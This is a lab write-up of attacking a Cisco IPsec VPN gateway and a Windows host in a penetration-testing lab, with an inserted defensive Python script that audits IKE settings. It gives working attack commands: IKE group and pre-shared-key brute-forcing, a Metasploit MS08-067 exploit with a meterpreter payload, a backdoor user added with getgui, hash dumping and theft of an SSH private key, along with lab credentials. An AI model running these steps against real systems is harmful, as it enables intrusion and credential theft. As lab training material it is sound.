Test lab V8 (II): Cisco devices and Terminal Systems
This is the second part of the test lab v8 report. In the first part, we compromised two systems, Site and Cabinet, through the gateway 192.168.101.6. In this part, we will see how to find the tokens of the Cisco device and the Terminal system through the gateway 192.168.101.7.
Attack CISCO:
Run the following command to scan the gateway using nmap:
nmap -sS -sV -Pn -p1-65535 192.168.101.7
Nmap finds two open ports, SSH and HTTP. Opening the IP address on port 8100 in a browser loads a webmail application. While attacking the Site and Cabinet systems, we had found a valid login credential for Ralph Westfall. We tried this credential (RalphWestfall@sasbank.lab / freeman) and the login succeeded.
After logging on, we read through all the emails and found something of interest: the VPN password.
If we look at the network topology, we find a Cisco router. Now we try to reach the VPN network. For this we need two tools, IKEforce and ike-scan. Run ike-scan with the following command:
sudo ike-scan -M --id=test -A 192.168.101.7
In this command, -M prints the output in multi-line (readable) form, -A selects IKE Aggressive Mode, and --id supplies an arbitrary group name, which the tool requires in Aggressive Mode.
From the ike-scan output we can read the following transform set:
Enc = 3DES
Hash = SHA1
Group = 2: modp1024
Auth = psk
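As an added example (not part of the original write-up), the following Python parses ike-scan -M output such as the block above and flags the settings a defender should remediate on the gateway: Aggressive Mode with a pre-shared key, 3DES, SHA1 and a 1024-bit DH group. The sample output is constructed to mirror the values reported here; the cookie value is made up.

```python
import re

# Constructed sample modelled on ike-scan -M output. The transform values are the
# ones reported on this page; the CKY-R cookie is an invented placeholder.
SAMPLE = """\
192.168.101.7\tAggressive Mode Handshake returned
\tHDR=(CKY-R=0123456789abcdef)
\tSA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tKeyExchange(128 bytes)
\tNonce(20 bytes)
\tID(Type=ID_IPV4_ADDR, Value=192.168.101.7)
\tHash(20 bytes)
"""

WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_GROUPS = {"1", "2", "5"}   # modp768 / modp1024 / modp1536 are below current guidance


def parse_ike_scan(text):
    """Return one dict per responding host: address, handshake mode and SA attributes."""
    hosts = []
    cur = None
    for line in text.splitlines():
        m = re.match(r"^(\S+)\t(Aggressive|Main) Mode Handshake returned", line)
        if m:
            cur = {"host": m.group(1), "mode": m.group(2), "sa": {}}
            hosts.append(cur)
            continue
        m = re.match(r"^\tSA=\((.*)\)$", line)
        if m and cur is not None:
            for key, value in re.findall(r"(\w+)=(\S+)", m.group(1)):
                cur["sa"][key] = value
    return hosts


def audit(host):
    """Findings a defender would raise for one parsed responder, in a fixed order."""
    sa = host["sa"]
    findings = []
    if host["mode"] == "Aggressive" and sa.get("Auth", "").upper() == "PSK":
        # Aggressive Mode exposes the responder hash, so the PSK can be guessed offline.
        findings.append("aggressive-mode-psk")
    if sa.get("Enc") in WEAK_ENC:
        findings.append("weak-enc:" + sa["Enc"])
    if sa.get("Hash") in WEAK_HASH:
        findings.append("weak-hash:" + sa["Hash"])
    if sa.get("Group", "").split(":")[0] in WEAK_GROUPS:
        findings.append("weak-dh-group:" + sa["Group"])
    return findings


if __name__ == "__main__":
    for h in parse_ike_scan(SAMPLE):
        print(h["host"], h["mode"], audit(h))
```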
Now we use IKEforce to enumerate a valid VPN group name, brute forcing it with IKEforce's default dictionary. The command is as follows:
sudo ./ikeforce.py 192.168.101.7 -e -w wordlists/groupnames.dic -t 5 2 1 2
In this command, the -t parameter specifies the encryption type, hash type, group, and authentication method, which we obtained with ike-scan. The tool's help text contains a table mapping these values, as shown below:
After running the tool, we found the correct group id: vpn.
Now that we have the correct group id, we run ike-scan again to capture the PSK handshake, using the following command:
sudo ike-scan -M --id=vpn -A 192.168.101.7 -Pcapture.psk
After it runs, we have a capture.psk file.
Now we try to brute force the captured PSK. The ike-scan package includes a psk-crack tool, which we run with the following command:
psk-crack -d /usr/share/wordlists/rockyou.txt capture.psk
As the output shows, we found the correct key: cisco123.
Now we have everything needed for the VPN connection:
Gateway IP: 192.168.101.7
IPSec ID: vpn
IPSec secret: cisco123
Username: westfall
Password: AiWa8ahk
We then connected to the Cisco device using vpnc.
To check whether the tunnel gave us Internet access, we pinged Google by name and got no reply; pinging Google's IP address directly, however, did get a response.
This looked like a DNS resolution problem, so we opened /etc/resolv.conf to investigate, and there we found the token.
Attack TERMINAL:
Now that we can connect to the VPN, we can attack the machine TERMINAL in the other network. Before running any tool, we confirm that we are connected to the Cisco VPN, then port scan with nmap. The command is as follows:
nmap -sS -sV -Pn -A 192.168.0.2
Judging by the open ports, the system appears to have the well-known netapi vulnerability: port 445 is open and the SMB service is running, which is exposed to remote attack. Run the following commands in Metasploit:
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.0.2
exploit
The exploit ran smoothly and we now have a meterpreter session. We use a post-exploitation script that adds a user to the system. The command is as follows:
run getgui -u test -p test
Now we can log on to the Terminal system with test/test.
Once logged on, we need to find the token. Open Start -> Administrative Tools -> Computer Management, click Local Users and Groups -> Users; the token is in the account description of the user westfall.
Our work is not finished yet. Whenever we compromise a system, we need to browse the whole system for files and information that can help us compromise other systems on the network. As we can see below, the system has many users, and some of them may also be valid on other systems, so we use meterpreter to dump the hashes of all users. The command is:
run hashdump
Copy all the hashes into a text file, then crack them with the Ophcrack tool using the XP fast and XP small tables. The hash cracking result follows:
We also found a .ppk file, generated by PuTTY, on westfall's desktop.
We copied the .ppk file to our local system. To convert it to OpenSSH format, we open it in the PuTTYgen tool: click Load and select the .ppk file.
Then select Conversions -> Export OpenSSH key.
In the output information, we can obtain the SSH private key.
Now, the attack on the Terminal system is finally completed.